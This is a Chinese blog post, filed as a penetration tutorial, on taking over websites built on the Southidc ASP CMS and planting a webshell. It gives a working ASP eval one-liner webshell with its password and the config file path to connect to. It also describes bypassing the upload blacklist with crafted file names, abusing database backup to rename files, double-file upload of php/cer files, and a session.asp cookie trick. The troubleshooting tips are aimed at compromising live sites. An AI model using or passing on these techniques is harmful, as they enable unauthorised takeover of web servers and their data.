解决良精科技(southidc)被破坏的情况拿shell

作者:Tigh     发布于「渗透教程」 - 猫雅博客

标签:
2017-03-06 分类:渗透教程 阅读(137) 评论(0) 百度已收录
当前位置:猫雅博客 > 网络安全 > 渗透教程 > 正文
赞(0) 打赏

作者:Tigh

站长QQ1165500646

手机扫码查看

特别声明:文章多为网络转载,资源使用一般不提供任何帮助,特殊资源除外,如有侵权请联系!

不知道大家有没有遇到这种情况,原本很好拿的南方科技但是很多平常可以利用的方式都不可以使用了。

那么我们来总结一下常见拿南方科技的方式。

前台得到账户密码这里不多做讲诉,不过有一款类似的cms倒是存在cookies欺骗,因为这款cms使用的是asp session时钟是30min

也就是说我们一般遇到了最多也只能在30分钟里面进行操作。

访问后台页面如果存在session.asp,那么你就会得到一个session然后你就可以操作你想操作的了。

那么我们继续我们要说的后台常见拿shell的方式。

1> 数据库插入拿shell

打开网站配置—-随便找一个字符长度没有限制的地方插入你的回执代码。

因为asp需要用<% %>来闭合,而且一个标记和另外一个标记之间通常会用双引号和单引号来闭合

所以这里我们插入一句话代码在网站地址这里因为这里的长度通常不会太短。。 当然一般也是可以修改源码来获得更加长的字符长度。。。

一句话内容:

“%><%a=request(“L0s4r”)%><%eval a%><%’

密码:L0s4r

连接地址inc/config,asp

2>数据库备份拿shell

通常情况来讲数据库被分拿shell会需要fso权限而且还要开放了才可以,这里我推荐大家使用抓包工具修改路径和后缀数据。

3>编辑器拿shell

编辑器拿shell,方式很简单了就是类似eweb拿shell一样,打开southidceditor/admin_style.asp

然后修改样式数据,因为这个编辑器采用的是过滤和黑名单的方式来实现上传监控。所以我们只需要构造一下上传的文件名就可以了

比如aaspsp,具体这里吧多做叙述。

4>双文件上传拿shell

其实双文件上传就是修改表单数据造成的,其实因为这款系统没有过滤php和cer可以很简单的实现上传。php和cer文件。具体看网站配置。

下面说一下可能会遇到的问题

1 为什么我上传了文件打开却不存在

这里检查一下你的网站空间是否具有写入权限或者是否虚拟主机是否已经满了,检查方式就是打开文件管理,看能否删除文件。

如果是满了删除即可,如果没有写入权限通常是放弃。

2 我明明有写入权限但是上传文件为什么老是打开失败。提示不能解析

这里通常是因为服务商安装了安全软件导致的。最简单的方式就是换一个上传目录,具体参见网站配置

3 只有编辑器上传,没有表单上传。我上传的文件目录又不能建立,偏偏我就这么一个可以操作的和写入的地方我该怎么做。。

这里比较简单的方式就是利用数据库备份来实现文件目录的创建,修改提交数据即可。

先说到这里,有时间再继续更新!

不懂的话就留言问我吧!

分享到:
未经允许不得转载:

作者:Tigh, 转载或复制请以 超链接形式 并注明出处 猫雅博客
原文地址:《解决良精科技(southidc)被破坏的情况拿shell》 发布于2017-03-06

评论 抢沙发

4 + 4 =


解决良精科技(southidc)被破坏的情况拿shell

长按图片转发给朋友

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

微信扫一扫打赏

这绝对不是广告!

灌水说明

由于评论过多,垃圾评论日益严重,决定开始封禁不正常评论,我分享资源不欠谁,所以对于抱着敷衍不正常的评论者,很抱歉啦,本站不对你开放。

封禁列表
切换注册

登录

忘记密码 ?

您也可以使用第三方帐号快捷登录

Q Q 登 录
微 博 登 录
切换登录

注册